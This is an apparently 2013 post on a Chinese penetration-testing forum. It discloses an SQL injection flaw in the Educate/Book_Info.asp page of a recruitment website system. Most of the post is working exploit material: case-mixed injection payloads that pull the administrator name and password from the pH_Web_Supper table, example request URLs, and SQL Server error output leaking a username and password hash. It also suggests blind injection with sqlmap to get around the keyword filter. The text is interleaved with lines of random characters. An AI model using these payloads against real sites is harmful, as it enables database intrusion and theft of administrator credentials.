中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版注入
[打印本页]
作者:
admin
时间:
2013-2-16 21:44
标题:
网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
" Y$ R4 a8 f* X% i6 x
: N1 R p0 b1 h3 X
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
# W# I& J5 }8 ^
- L; [/ X, P j1 q$ j
exp:如下
* W3 K! c. o% {& o" F6 Y3 `
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
. ~* {' _. e# y: W( q7 M' C# f% ]
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 D5 z. l( W4 S9 i+ W8 P- p- Q' [
" |% H0 X& ~4 Y, Y- _
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 k2 T ^" l% |- C8 K; R7 c
# h. b3 v& c. A1 S% W
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
7 K5 `, o. e# t; ~
, f U; q8 A1 f+ @, o9 k4 \/ Q
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
D4 F8 C" [, o- p3 z+ B
* l, t. x' A+ O/ b3 @- }! k
/Educate/Book_Info.asp,行 8
0 q {. T9 O! {7 k
3 J+ Q( m; ?2 G
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
: c" n1 g7 W6 Z- F
* P2 n5 {( f+ L8 k2 U5 `9 s
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ R3 c0 G1 F ^4 H" k, c4 X1 l
D4 N. a9 B0 r. N; l
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
# g3 c% C6 N! J9 [, s% i0 G
' p- Y! Q6 L& P; x: X
/Educate/Book_Info.asp,行 8
% P) `% X1 U' l- a# z2 A
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2